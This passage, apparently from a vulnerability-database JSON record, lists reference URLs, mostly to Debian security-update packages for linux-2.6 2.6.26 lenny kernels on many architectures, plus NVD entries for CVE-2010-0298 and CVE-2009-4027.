        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny2.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-mckinley_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc64_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-itanium_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-versatile_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64-smp_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-itanium_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390-tape_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-footbridge_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-21lenny3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64-smp_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-21lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-21lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-mckinley_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-21lenny2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-ip32_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-generic_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64-smp_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-21lenny3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-sparc64_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mipsel_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64-smp_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-cobalt_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny3.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-sparc64_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64-smp_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc-smp_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-sparc_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny3.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny1.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390x_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc64_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390x_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-s390x_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-s390_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0298"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-versatile_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mips_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-21lenny3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-hppa_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390x_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-mckinley_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390x_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4027"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r4k-ip22_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-footbridge_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390-tape_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-21lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
